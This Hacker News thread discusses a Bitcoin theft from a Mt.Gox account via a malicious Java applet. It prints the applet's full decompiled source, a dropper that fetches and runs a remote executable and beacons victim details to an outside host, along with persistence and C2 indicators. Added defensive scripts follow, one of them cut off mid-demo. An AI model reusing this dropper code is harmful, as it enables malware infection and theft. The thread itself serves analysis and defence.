
How I got robbed of 34 btc on Mt.Gox today - pieter
https://bitcointalk.org/index.php?topic=173227.0
======
RyanZAG
Isn't this exactly what Bitcoin was created for - to allow unregulated access
to currency? I guess people don't really realize what unregulated actually
means - and nor do they realize why you really do want regulated currency.

This kind of thing happens all the time with real banks, but with real banks,
all transactions can be traced and reversed. Law enforcement can follow the
required documentation to find the owner of any account on a global level.
This is exactly what Bitcoin was created to avoid.

Well guess what? When you avoid the regulation, you take the safety of the
currency into your own hands. MtGox should not refund this in any way shape or
form. The problem was entirely his fault. He did not secure his MtGox account
with available two-factor authentication. He ran untrusted code at full
permission on his PC. He needs to take some responsibility for his own use of
an unsecured currency on an unsecured website with unsecured authentication
and running untrusted code.

Zero sympathy from me. Maybe it will be a wake up call to others to actually
think about their decisions. Shouting about the 'nanny state' and using
bitcoin, and then turning around and looking for a nanny to help him out when
he goes around it is pathetic.

~~~
code4life
We don't need sympathy or regulation. A simple market solution like voluntary
bitcoin insurance would do the trick.

~~~
Pinckney
How do you propose to defend against insurance fraud? With mixing services
available, there would seem to be very little risk in robbing one's own
account.

~~~
dgabriel
You make the insurance price and due diligence bar high enough.

------
mootothemax
_Mtgox has clearly not had time to respond, and I fear they will claim this is
my fault as I have seen in other posts online that they say "report it to the
police".

They should compensate me 100%._

This shows one of the fundamental problems with Bitcoin-related services: when
people get taken advantage of, they expect to be compensated.

While in the real world, banks will often compensate you if you're the victim
of fraud, there isn't any equivalent for Bitcoin, despite people _really
expecting_ it.

~~~
DanBC
...and banks will only compensate if they really have to because there are
laws compelling them to do so. If they can get away with saying it's your
fault they will.

While I have sympathy for the author it was a pretty silly thing to do.

~~~
danielweber
"Federal Reserve Regulation E guarantees that US consumers are made whole when
their bank passwords are stolen"

From
http://research.microsoft.com/apps/pubs/default.aspx?id=161829

Of course, as that paper points out, the traditional electronic money system
is incredibly reversible. If someone transfers $50,000 from my personal bank
account to someone else's bank account, it's pretty easy for it to be undone.

The bottleneck is the money mules who are hired (read: suckered) into engaging
in irreversible transactions.

~~~
salvadors
> If someone transfers $50,000 from my personal bank account to someone else's
> bank account, it's pretty easy for it to be undone.

That depends on the timeframe. Once the money has been moved out of that new
account again things start getting much harder.

~~~
jeremyjh
Not really. If a Bank gets a reversal before funds have cleared it's pretty
straightforward, and the stack will almost unwind itself as each Bank reverses
credits to the accounts in response to reversals before them. Depending on the
type of transfer, yes, there is a date beyond which reversals are not possible,
but the number of transfers has little to do with it.

~~~
danielweber
Thieves want to work to empty that new account as fast as possible. And they
still can't without suckers who volunteer to run a "check-cashing business" or
similar scam.

 _Because_ banks are held responsible for fraud (from consumer accounts), they
work hard to never be the ones holding the bag, so they put up roadblocks in
attempts to engage in irreversible transactions. If you say "hey, I opened my
account yesterday, now I want to withdraw the $40,000 that just showed up in
it, 10's and 20's please" they will nod politely and call a bank manager.

------
amanvir_sangha
Some basic analysis of the binary:

Creates the following directories:

    %UserProfile%\537214
    %UserProfile%\684544
    %AppData%\dclogs

Creates a new registry value (so that it runs every time on startup):

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    537214 = "%UserProfile%\537214\svhost.exe"

Tries to connect to:

    tamere123.no-ip.org on ports 80 and 1604

The subdomain above leads to the following IP:

    198.203.29.120

Which, according to iplocation.net, is located in:

    Los Angeles
    California
    ISP: Hugeserver Networks Llc

It's very unusual for malware to be hosted in the USA, so I would assume that
either it is a compromised computer/bot or it is some script kiddie using his
home connection; the latter is more likely since there were no exploits used,
just social engineering and luck.

File hashes:

    MD5: 0x81F8E4C33ADECE6BF89EF171D9930282
    SHA-1: 0xF540BA6C5F1C2AA50B81A440E7D74F8CF588B4D7
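
An added example, not code from the post above or from Mt.Gox, that turns those indicators into a host sweep: it flags autorun entries whose executable is a one-character squat on a system binary name (svhost.exe against svchost.exe) or a system binary name living outside the system directories, matches file hashes against the two posted, and picks the C2 host and ports out of a connection log. The list of imitated binaries, the two benign Run entries, and the connection-log lines are constructed for the demo; on Windows, collect_run_entries() reads the real HKCU Run key via winreg, elsewhere the constructed entries are used.

```python
"""Sweep autorun entries, file hashes and connection logs for the indicators
posted above. Added example for this thread; not code from the post, the
malware or Mt.Gox. Indicators are the ones listed in the analysis; the
sample Run entries and log lines are constructed for the demo."""
import sys

# Indicators quoted from the analysis above (hashes lower-cased, 0x dropped).
IOC_MD5 = "81f8e4c33adece6bf89ef171d9930282"
IOC_SHA1 = "f540ba6c5f1c2aa50b81a440e7d74f8cf588b4d7"
IOC_C2_HOST = "tamere123.no-ip.org"
IOC_C2_PORTS = {80, 1604}

# Assumption: a short list of Windows binaries that droppers imitate.
# svchost.exe is the one that "svhost.exe" in the Run key above mimics.
SYSTEM_BINARIES = ("svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character name squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def command_path(command):
    """Return the lower-cased executable path of a Run-key command, minus arguments."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0].lower()
    return command.split(" ", 1)[0].lower()


def suspicious_run_entries(entries):
    """entries: {value name: command}. Returns [(value name, reason), ...]."""
    findings = []
    for name, command in entries.items():
        path = command_path(command)
        exe = path.rsplit("\\", 1)[-1]
        folder = path[: len(path) - len(exe)]
        reasons = []
        for canon in SYSTEM_BINARIES:
            if exe == canon and not folder.startswith(SYSTEM_DIRS):
                reasons.append(f"{canon} outside a system directory")
            elif exe != canon and edit_distance(exe, canon) <= 1:
                reasons.append(f"{exe} imitates {canon}")
        # The sample names its Run value and its drop folder with the same digits.
        if name.isdigit() and f"\\{name}\\" in path:
            reasons.append("numeric value name matches numeric drop folder")
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings


def normalize_hash(h):
    h = h.strip().lower()
    return h[2:] if h.startswith("0x") else h


def is_known_sample(md5_hex=None, sha1_hex=None):
    """True if either hash (as printed by a tool, 0x prefix allowed) is the posted one."""
    return ((md5_hex is not None and normalize_hash(md5_hex) == IOC_MD5)
            or (sha1_hex is not None and normalize_hash(sha1_hex) == IOC_SHA1))


def c2_connections(log_lines):
    """Return lines of a constructed 'src -> host:port' log that hit the C2 host
    on one of its two ports."""
    hits = []
    for line in log_lines:
        if " -> " not in line:
            continue
        dest = line.split(" -> ", 1)[1].split()[0]
        host, _, port = dest.rpartition(":")
        if host.lower() == IOC_C2_HOST and port.isdigit() and int(port) in IOC_C2_PORTS:
            hits.append(line)
    return hits


def collect_run_entries():
    """Read HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run on Windows; {} elsewhere."""
    if sys.platform != "win32":
        return {}
    import winreg
    entries, i = {}, 0
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                         r"Software\Microsoft\Windows\CurrentVersion\Run")
    while True:
        try:
            name, value, _ = winreg.EnumValue(key, i)
        except OSError:
            return entries
        entries[name] = str(value)
        i += 1


# Constructed sample data: the posted Run entry plus two benign ones.
SAMPLE_RUN_ENTRIES = {
    "537214": r"C:\Users\victim\537214\svhost.exe",
    "OneDrive": r'"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
}
SAMPLE_CONN_LOG = [
    "2013-04-10T12:00:01 10.0.0.5 -> tamere123.no-ip.org:1604 SYN",
    "2013-04-10T12:00:02 10.0.0.5 -> www.example.com:443 SYN",
    "2013-04-10T12:00:03 10.0.0.5 -> tamere123.no-ip.org:8080 SYN",
]

if __name__ == "__main__":
    for name, reason in suspicious_run_entries(collect_run_entries() or SAMPLE_RUN_ENTRIES):
        print(f"[!] Run\\{name}: {reason}")
    for line in c2_connections(SAMPLE_CONN_LOG):
        print(f"[!] C2 contact: {line}")
```

The hash check is deliberately the weakest signal here: a recompiled dropper changes both hashes, while the Run-key naming pattern and the dynamic-DNS C2 host survive trivial rebuilds.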

~~~
TazeTSchnitzel
<https://news.ycombinator.com/item?id=5531500>

It's a service by script kiddies for script kiddies.

------
dreen
So... you ran a Java applet on a domain with mtgox in its name and didn't make
sure that site is owned by MtGox?

I'm sorry for your loss but what happened is your own fault entirely and I
would be surprised if MtGox decides to refund you.

~~~
burntsushi
> I would be surprised if MtGox decides to refund you

I agree that MtGox shouldn't be doing any kind of refunding in this case.

> what happened is your own fault entirely

You're blaming the victim.

If I'm walking down a dark alley and someone pulls a gun on me and takes my
wallet, is it _my fault_ because I decided to walk down a dark alley? Not at
all.

The only person at fault here is the cracker who perpetrated the scam.

The only thing you can say about the victim in this case is that they aren't
very sensible. Just like walking down dark alleys might not be sensible. But
it's not the OP's fault that someone stole something from him.

~~~
sequoia

    +-------------------------------------------------------+
    |                  SECURITY WARNING!                    |
    |  You are attempting to walk down a dark alley,        |
    |  which could be dangerous.  Only walk down            |
    |  dark alleys you are familiar with and trust.         |
    |  By walking down this alley you assume responsibility |
    |  for the attendant risks.                             |
    |                                                       |
    |  Do you still wish to walk down the dark alley?       |
    |  [x] Yes         [ ] Cancel                           |
    +-------------------------------------------------------+

Perhaps a better phrasing than "your own fault" is "it was 100% in his power
to prevent this from happening. He is responsible for the fact that it
happened."

~~~
mikeash
Fault and blame is not zero-sum, a point many people seem to miss. Realizing
that the victim has some (and he certainly does here, and in many other cases)
does not in any way reduce what attaches to the perpetrator.

------
Pezmc
TLDR; OP runs java applet (either in browser or downloaded it). Java applet
sends bitcoin from OP's MtGox account to the 'hackers' bitcoin address, using
the OP's browser, which was logged in to his MtGox account at the time.

~~~
ben0x539
Yeah, this has fuck-all to do with bitcoins. Same thing could have happened
with real money through paypal or a bank's website, except those are probably
a few steps ahead of babby's first online banking website in terms of
mitigating against likely attack vectors.

------
tripzilch
So, how about if you could have a Linux boot image onna stick, properly
secured, no Java, several BitCoin apps preinstalled and optimized to boot
extremely quickly into what would basically be a sort of BitCoin Wallet
dashboard interface.

You could plug in the USB, hibernate, flip the switch and be Bitcoin banking
within seconds. Then unhibernate and get on with whatever you were doing on
your day-to-day OS.

That way it can be completely separate from whatever risky, dangerous and/or
irresponsible things you do on a regular basis with your computer--things that
seemingly are worth the risk as long as they don't directly give attackers
access to thousands of $$$ digital cash.

Question, I'm making a rough guess that a realistic speed-optimized fast boot-
time for a Linux OS that doesn't need to do much is in the order of five
seconds, is that about right? Also, I'm not 100% sure if that hibernation
trick is actually possible, I've never really seen it on multi-boot systems
and I wonder why, but from what I understand about hibernation (RAM gets saved
to HD, restored next boot) the components are there?

And, make it look unlike any other OS, to make users instantly aware if
they're operating on their banking/money "inside the stick" or "out in the
open" (on the regular OS). For instance, a glowy green CRT terminal filter.

~~~
ConceitedCode
The biggest issue I see would be updating the block chain for the wallet
between uses. Seems like it takes longer and longer to update. Moved my wallet
to a new computer last night and it's been going for the last 5 hours.

~~~
cookiecaper
If you download the blockchain from the P2P wallet client it always takes
forever. You should download the blockchain once, put it on a USB drive, and
then copy it into .bitcoin before you bootstrap a new machine with a wallet.

There are also sites that offer downloads of tar'd versions of the blockchain,
or torrents. Pretty much anything is going to be faster than downloading via a
bitcoin client.

~~~
tripzilch
This thread appears to have a download/torrent for a recent version of the
blockchain data. It's about 4.7GB, apparently.

<https://bitcointalk.org/index.php?topic=145386.0>

So does that mean if you're not using BC via a wallet service, it requires at
least 4.7GB of disk space in order to do its thing? How is this amount of data
expected to grow in the future?

~~~
lmm
It's going to grow hugely (at least as long as punters keep using bitcoin);
there's an expectation that clients will switch away from using the full
history sooner or later, and there are mechanisms prepared for remaining
reasonably secure with shorter histories.

~~~
sliverstorm
Hah, so eventually only a few people like central power figures in the bitcoin
community will be running with the full blockchain eh? Probably my favorite
thing about bitcoin is how, despite its explicit goals, the more adoption it
sees the more it looks like it will turn into the same old thing we already
have.

~~~
lmm
I remember a friend making a similar comment about EVE online: you set people
loose in this anarchistic, libertarian blank state, give them a few years,
and... turns out they'll band together into gangs with leaders, that develop
into communities with formal governance processes; neighbours helping each
other out grows into insurance syndicates....

We've already seen people wanting an authority to compensate them when their
bitcoins are stolen; bitcoins are meant to behave like cash, but an FDICed
bank account is much more useful than cash for most people. That said, as long
as the full feed remains open to anyone who has the spare compute power/disk
space and wants to connect up to it, there's still a big difference from the
existing financial system.

------
antr
I'm not doubting Bitcoin's potential to become a _true_ currency, but unless
this type of smash-and-grab situation can be traced/avoided/insured (whatever
the right mechanism is) it is going to be extremely hard to make ordinary
businesses and people use it. People don't place value in the currency itself,
but the system that provides certain security around it.

~~~
hodgesmr
Banks that handle USD follow strict federal regulations on security procedures
and insurance. If this happened at a bank, the OP would absolutely get his
money back. Bitcoin needs federal regulations... oh wait...

~~~
antr
Agree. When a transaction is not authorised by the account holder, this
transaction is legally invalid. _Any_ bank would _give_ the money back in this
kind of situation.

I can't imagine my parents (or 99% of the adult population) being liable for
this theft when "proper security precautions" means knowing when to detect and
avoid a "0 day java exploit with a cross site injection attack".

~~~
lucian1900
Not really. Most banks I've asked would not refund if the victim did not take
proper security measures, and the OP in this case most certainly did not.

~~~
danielweber
Banks are required to make users whole, even if the user's password is
compromised. At least for individual accounts. (For businesses the situation
is different.)

http://research.microsoft.com/apps/pubs/default.aspx?id=161829

~~~
lucian1900
It depends very much on local laws in your country, from what I've seen.

------
TazeTSchnitzel
From the source of mtgox-chat.info:

    <applet name='ChatBox' width='10' height='10' code='wDbIDcgeH.class' archive='wDbIDcgeH.jar'></applet>

Yep, probably an exploit, there aren't many good reasons for a 10x10 applet.
Let's download the jar. It contains a single 3.5KB payload. Let's use a Java
decompiler (JD-GUI).

      import java.applet.Applet;
      import java.applet.AppletContext;
      import java.io.BufferedInputStream;
      import java.io.BufferedOutputStream;
      import java.io.FileNotFoundException;
      import java.io.FileOutputStream;
      import java.io.IOException;
      import java.net.InetAddress;
      import java.net.MalformedURLException;
      import java.net.URL;
      import java.util.logging.Level;
      import java.util.logging.Logger;
    
      public class wDbIDcgeH extends Applet
      {
        static String lik = "h?t?t?p?:?/?/?w?w?w?.?g?a?l?a?x?y?j?d?b?.?c?o?m?";
    
        public static void logme(String paramString)
        {
          String str1 = lik.replace("?", "");
          String str2 = "PoutineCoutu";
          try {
            String str3 = InetAddress.getLocalHost().getHostName().replace(" ", "-");
            URL localURL = new URL(str1 + "/insert.php?" + "&o=" + System.getProperty("os.name").replace(" ", "-") + "&u=" + str2 + "&ip=" + str3 + "&e=" + paramString);
            localURL.openStream();
          } catch (IOException localIOException) {
            localIOException.printStackTrace();
          }
        }
    
        public void start()
        {
          String str1 = "no";
          String str2 = System.getenv("APPDATA");
          String str3 = System.getProperty("java.io.tmpdir");
          String str4 = "http://g2f.nl/0lczsoo";
          String str5 = str2 + "\\";
          String str6 = "AdobeUpdate-Setup1.84##e";
          String str7 = "f.R.q.w.v.k.p.g.E.q.w.v.w";
          String str8 = "CodedByOrpheu";
    
          String str9 = str5.concat(str6.replace("##", ".ex"));
          BufferedInputStream localBufferedInputStream = null;
          try {
            localBufferedInputStream = new BufferedInputStream(new URL(str4.replace("##", ".ex")).openStream());
          } catch (IOException localIOException1) {
            if (str1 != "yes") logme("Noa");
            str1 = "yes";
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException1);
          }
    
          FileOutputStream localFileOutputStream = null;
          try {
            localFileOutputStream = new FileOutputStream(str9);
          } catch (FileNotFoundException localFileNotFoundException) {
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localFileNotFoundException);
          }
    
          BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
          byte[] arrayOfByte = new byte[1024];
          try
          {
            int i;
            for (long l = 0L; (i = localBufferedInputStream.read(arrayOfByte)) != -1; l += i)
              localBufferedOutputStream.write(arrayOfByte, 0, i);
          }
          catch (IOException localIOException2) {
            if (str1 != "yes") logme("Noc");
            str1 = "yes";
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException2);
          }
          try {
            localBufferedOutputStream.close();
          } catch (IOException localIOException3) {
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException3);
          }
          try {
            localBufferedInputStream.close();
          } catch (IOException localIOException4) {
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException4);
          }
          try {
            Runtime.getRuntime().exec(str9);
            logme("Yes");
          } catch (IOException localIOException5) {
            logme("Nod");
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException5);
          }
          try
          {
            getAppletContext().showDocument(new URL("0"), "_self");
          } catch (MalformedURLException localMalformedURLException) {
            System.exit(0);
    
            localMalformedURLException.printStackTrace();
          }
        }
    
        public void init() {
          start();
        }
  }

Well, I can't decipher that, but some security expert might be able to see
what's going on.

~~~
Pezmc
It sends log messages to <http://www.galaxyjdb.com> with your OS information
and the state of the app.

    /insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE*

It appears to download an exe from <http://g2f.nl/0lczsoo>

Then it tries to execute the exe:

    System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe";

If at any point in the process it hits an exception, it sends the code for
that exception to the galaxy web address, presumably so the dev can see how
the app is performing.

Now normally it wouldn't be able to execute the exe (no access to the
filesystem), but it looks like the applet requests elevated permissions from
the user to allow it to access/run files.
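
An added example (mine, not the applet's code or anything posted by the thread's participants) that recovers the dropper's configuration by applying the same replace() transforms the decompiled start() and logme() methods do, rebuilds the beacon URL as logme() constructs it (u= carries the constant str2, ip= the local hostname with spaces dashed, e= one of the Yes/Noa/Noc/Nod states the code reports), and matches that beacon in a constructed proxy log. decode_str7() is my own observation from the posted literals, not something the thread states: str7 is unused by the decompiled code, and with the dots removed and every letter shifted back by two it reads dPoutineCoutu, which contains the same tag the beacon sends.

```python
"""Recover the dropper's config from the decompiled applet's string transforms
and match its beacon in proxy logs. Added example for this thread, not the
applet's own code. Literals are copied from the decompiled class above; the
APPDATA value and the proxy log lines are constructed for the demo."""
import re
from urllib.parse import parse_qs, urlsplit

# Literals exactly as they appear in wDbIDcgeH.class.
LIK = "h?t?t?p?:?/?/?w?w?w?.?g?a?l?a?x?y?j?d?b?.?c?o?m?"
STR2 = "PoutineCoutu"
STR4 = "http://g2f.nl/0lczsoo"
STR6 = "AdobeUpdate-Setup1.84##e"
STR7 = "f.R.q.w.v.k.p.g.E.q.w.v.w"
# e= values logme() is called with, and the branch each one comes from.
STATES = {"Yes": "payload executed", "Noa": "download failed",
          "Noc": "write to disk failed", "Nod": "exec failed"}


def extract_config(appdata=r"C:\Users\victim\AppData\Roaming"):
    """Apply the same replace() calls start() does; appdata is a constructed
    value standing in for System.getenv("APPDATA")."""
    payload_name = STR6.replace("##", ".ex")          # AdobeUpdate-Setup1.84.exe
    return {
        "log_host": LIK.replace("?", ""),             # http://www.galaxyjdb.com
        "campaign_tag": STR2,
        "payload_url": STR4.replace("##", ".ex"),     # no-op: the URL holds no "##"
        "drop_path": appdata + "\\" + payload_name,
    }


def decode_str7():
    """str7 is never used by the decompiled code. Editor's observation: strip the
    dots and shift each letter back by two and it reads dPoutineCoutu."""
    return "".join(chr(ord(ch) - 2) for ch in STR7.replace(".", ""))


def beacon_url(os_name, hostname, state):
    """Rebuild the GET that logme() issues, stray leading '&' included."""
    return (f"{LIK.replace('?', '')}/insert.php?&o={os_name.replace(' ', '-')}"
            f"&u={STR2}&ip={hostname.replace(' ', '-')}&e={state}")


BEACON_RE = re.compile(r"https?://(?:www\.)?galaxyjdb\.com/insert\.php\?", re.I)


def find_beacons(proxy_lines):
    """Scan 'client method url' proxy lines (constructed layout) and return
    (client, state, tag) for each request to the logger endpoint."""
    hits = []
    for line in proxy_lines:
        fields = line.split()
        if len(fields) < 3 or not BEACON_RE.match(fields[2]):
            continue
        qs = parse_qs(urlsplit(fields[2]).query)
        hits.append((fields[0], qs.get("e", [""])[0], qs.get("u", [""])[0]))
    return hits


SAMPLE_PROXY_LOG = [   # constructed for the demo
    "10.0.0.5 GET http://www.galaxyjdb.com/insert.php?&o=Windows-7&u=PoutineCoutu&ip=VICTIM-PC&e=Yes",
    "10.0.0.5 GET http://g2f.nl/0lczsoo",
    "10.0.0.7 GET https://mtgox.com/",
]

if __name__ == "__main__":
    for key, value in extract_config().items():
        print(f"{key:13} {value}")
    print("str7 decoded:", decode_str7())
    for client, state, tag in find_beacons(SAMPLE_PROXY_LOG):
        print(f"{client} beaconed with tag {tag}: {STATES.get(state, state)}")
```

The e= value is the useful bit for incident response: a Yes beacon from a client means the second stage was written and launched, so that host needs the full persistence check rather than just a cache purge.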

~~~
DanBC
AVG detects this as Luhe.Fiha.A

Here's a mention from 2011:

(http://answers.microsoft.com/en-us/windows/forum/windows_7-security/what-is-luhefihaa-detected-by-avg-antivirus-on-5/39ec50b5-fffb-4ff8-bb77-c7d6f35a6d62)

So, someone using an OS heavily targeted by malware decides not to use anti-
malware software, and to have javascript and apparently java enabled in the
browser, and then chooses to visit an URL advertised in a chat window - that
URL is unknown to that person, does not match the URL they're on but claims a
link to the URL they're on, etc etc.

It's a shame someone got robbed, and the responsibility is clearly on the
criminal to not engage in criminal behaviour.

But come on; don't just give them your money.

EDIT: I just read the first answer to the MS post above. It's baffling.

> _On reflection the best and easiest recourse might be to just tell AVG to
> "ignore" this "infection." Is this thing actually a virus? or an infection?
> I have seen no operational problems, nothing in chkdsk, sfc, Registry
> Mechanic, etc., to concern me._

Totally unrelated to MtGox but: someone has anti-malware software. That
software tells them it's found an infected file. There's no evidence this is a
false positive. Rather than wipe and re-install (a distressingly unpopular
choice) or using anti-malware tools to clean the infection the advice is to
train the software to ignore the infection.

MS is stuffed. There is _nothing_ they can do to repair their malware
reputation when the users are that stupid.

~~~
tallanvor
This isn't just an MS problem. Macs have the problem where users still believe
their OS isn't vulnerable to malware and as such aren't careful either.

------
Cakez0r
He seems to think MtGox should compensate his loss, but I really don't see how
it's their fault. The guy fell victim to a phishing scam, plain and simple. It
was completely out of MtGox's hands.

------
tripzilch
> I then discovered that the site is loaded with a java script which, based on
> an initial analysis by my java programmer friend, is a 0 day java exploit
> with a cross site injection attack, which automatically started

"Being a techie", I like to confuse Java and Javascript ...

~~~
jotaass
Well, he did put a space there. I'd give him a pass.

~~~
tripzilch
I would have, but then the term " _cross site_ injection attack", is again
Javascript terminology (he probably meant XSS or CRSF, but the term "cross
site" doesn't really apply to Java applets).

However, the guy just got hacked out of about $8k worth of BC, which sucks,
and for that I do give him a pass :)

~~~
Intermernet
I'm assuming you mean "XSS or CSRF". In both cases the first 2 letters denote
"Cross Site".

But, I'm picking hairs, and as you say, the guy just lost a shed-load of coin,
so mostly sympathy (with a bit of urge to educate) from this end.

EDIT: Sorry, your comment was slightly ambiguous, I apologize for picking on a
typo, I originally thought you were saying that XSS and CSRF had nothing to do
with "Cross Site" which, upon reading again, I noticed was not the case.
(Also, I made the same typo (CRSF) while typing this and only caught it just
before hitting the submit button!)

~~~
tripzilch
Well abovethread it turns out he must have clicked through all sorts of Java
certificate warning boxes, or run an old vulnerable Java version -- now I feel
about as sorry for him as someone whose laptop got stolen as they left it
unattended on the table in a coffeeshop for a toilet break. You can wait for
something to happen like that.

------
fmavituna
A bit off topic, but if you care about security DO NOT INSTALL JAVA on your
computer. I've been Java-free for the last ~5 years and I never really needed it.

Java's security track record is horrible and it's quite a popular target.

~~~
Tomdarkness
I think that is a bit extreme. I'd suggest rather than not installing Java at
all just to not install/disable the browser addons that allow Java applets to
execute. This way the only way you are going to be executing anything Java is
by downloading the .jar (or an executable wrapper) and running it.

To me, if you have to download the .jar and run it then that is no different
from downloading an executable and running it, and you should take the same
precautions as you would with executables.

There are plenty of legitimate Java applications out there that are used by a
wide spectrum of people from gamers (minecraft) to enterprise developers
(JavaEE, java application servers, etc.).

~~~
andyhmltn
How is it extreme? The only time I've needed java is for minecraft. Luckily
I'm not rocking windows so the chance of being hit by a 0-day is a bit lower
(correct me if I'm wrong.)

But stopping the chance of having everything in your digital (and in the case
of money, personal) life stolen because you clicked on a link FAR outweighs
the benefit of playing minecraft imo.

~~~
Tomdarkness
I think you need to go back and read what you replied to.

Having Java installed but with Java disabled in your browser, like I
suggested, means Java applets won't run in your browser at all. You'd need to
download and execute the .jar or wrapper (which would be an executable anyway),
which is no different from downloading any normal executable and running it.

~~~
andyhmltn
Well yes I agree on that actually. Probably should've thought that through.

------
smoyer
I wonder how much of the increase in MtGox accounts and MtGox trading
volume (discussed here: <https://news.ycombinator.com/item?id=5529986>) is due
to this malware. If I were the author of this program, I'd spread the trading
out over a large number of accounts and hit as many people as I could in a
short time period (once the news gets out, this exploit will be _much_ less
effective).

------
jack_trades
How useful is a "currency" if it 1) has volatility like a penny stock and 2)
raises the stakes on 0-day defense to something ridiculous?

When I hear interviews where people (bitcoin founder) suggest that you don't
transfer into bitcoins any state currency you aren't willing to lose... it
sort of peels the "inflation-hedge" covers off the whole thing. How unstable
and insecure does a currency have to be to be nearly worthless? US dollars look
pretty safe again.

This is so much a game of hacker gambling. A great experiment. Too bad it
consumes so much productive time and energy.

The beautiful narrative of the reclusive, open-society, eastern hacker that
designs this thing which grows to be the godzilla it is... The story arc on
bitcoin is borderline trite. Michael Bay is all over this in a year.

------
amalag
It's funny that people throw around words like "java script 0 day exploit" and
then post:

> Then and there someone posted a link to www mtgox-chat info (do not open
> unless you know what you are doing) claiming a video announcement that mtgox
> was going to start trading litecoins. I clicked on the link, the website
> opened, not much happened, and the "video"/chatbox never loaded. I then
> forgot about this website.

------
sequoia
I'm really confused by the title, in particular the "on Mt.Gox" part. Was he
"on Mt.Gox['s website]" when he came across this applet? He makes it sound
like the exploit was _on_ mt. gox.

If he got a trojan on a third party site that compromised his computer and Mt.
Gox's site had nothing to do with it, this title seems a bit libelous. If in
fact that's the case, I'd implore HN mods to change the title to something
that doesn't unfairly cast aspersions on the Mt.Gox site.

 _FWIW: I have no bitcoins, I don't fully grok bitcoins, I'm scared of
bitcoins, I don't use mt.gox or any vendor_

~~~
ScottBurson
You have a point. His protestations notwithstanding, Mt. Gox does not appear
to bear any responsibility for this at all. What happened was, he let his
browser get pwned while he had his Mt. Gox account open in another tab. The
coins were taken from his Mt. Gox account, but the security breach was on his
end.

------
axefrog
MtGox really does run a subpar operation. There should be additional security
checks when transferring money out of an account, and there should be the
option to enable multifactor authentication. Back when they were originally
hacked, this should have become top priority for them, along with making their
service rock solid. If people are hacking and stealing from you, it's obvious
you have something of value and need to take steps to protect what you have,
_especially_ when it's being held on behalf of a customer.

~~~
DanBC
This wasn't someone hacking MtGox.

This was someone on a vulnerable OS, running without malware protection, with
Java active in the browser, visiting an unknown link, and possibly giving an
application permission to run. (Although maybe it didn't need permission to
run?)

To get to that point the person needed to ignore several well established
security principles.

~~~
StavrosK
Oh come on, how hard is it for MtGox to implement TOTP and tell users to
download Google Authenticator? It's not really that much hassle to enter a
code each time you want to make a transaction, and these things wouldn't
happen.

Sure, the user was being stupid here, but MtGox didn't do them any favors
either.
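
To make the per-transaction TOTP point concrete, here is an added example (not Mt.Gox's code; the withdraw functions are a hypothetical server API, and the session dicts stand in for a real login cookie) implementing RFC 6238 codes with Python's standard library and putting them in front of a withdrawal. The secret is the RFC 6238 test key, so the codes can be checked against the vectors the RFC publishes, and the base32 form is what an authenticator app would be given.

```python
"""Per-transaction TOTP confirmation (RFC 6238), as an added example for this
thread. Not Mt.Gox's code: withdraw_insecure() and WithdrawalGate are a
hypothetical server API; the secret is the RFC 6238 Appendix B test key."""
import base64
import hashlib
import hmac
import struct
import time


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, for_time: float, digits: int = 6, step: int = 30) -> str:
    """RFC 6238: HOTP with counter = floor(unix time / step)."""
    return hotp(key, int(for_time) // step, digits)


def secret_from_base32(text: str) -> bytes:
    """Authenticator apps take the shared secret as (usually unpadded) base32."""
    text = text.strip().replace(" ", "").upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def withdraw_insecure(session, amount, address):
    """The pattern the thread describes: a live login is the only check, so
    anything that can drive the logged-in browser can move the coins."""
    return bool(session.get("logged_in"))


class WithdrawalGate:
    """A withdrawal needs a fresh TOTP code on top of the session. Each counter
    value is accepted once (no replay) and only within +/- `window` steps."""

    def __init__(self, secret: bytes, digits: int = 6, step: int = 30, window: int = 1):
        self.secret, self.digits, self.step, self.window = secret, digits, step, window
        self.spent = set()   # counters whose code has already authorised a withdrawal

    def withdraw(self, session, amount, address, code, now=None):
        if not session.get("logged_in"):
            return False
        if not (code.isdigit() and len(code) == self.digits):
            return False
        counter = int(time.time() if now is None else now) // self.step
        for c in range(counter - self.window, counter + self.window + 1):
            if c in self.spent:
                continue
            # Constant-time compare so the check does not leak matching prefixes.
            if hmac.compare_digest(hotp(self.secret, c, self.digits), code):
                self.spent.add(c)
                return True   # ledger update would go here
        return False


RFC_SECRET = b"12345678901234567890"   # RFC 6238 Appendix B test key (SHA-1)

if __name__ == "__main__":
    session = {"logged_in": True}
    gate = WithdrawalGate(RFC_SECRET)
    print(withdraw_insecure(session, 34, "1Example"))         # True: cookie alone suffices
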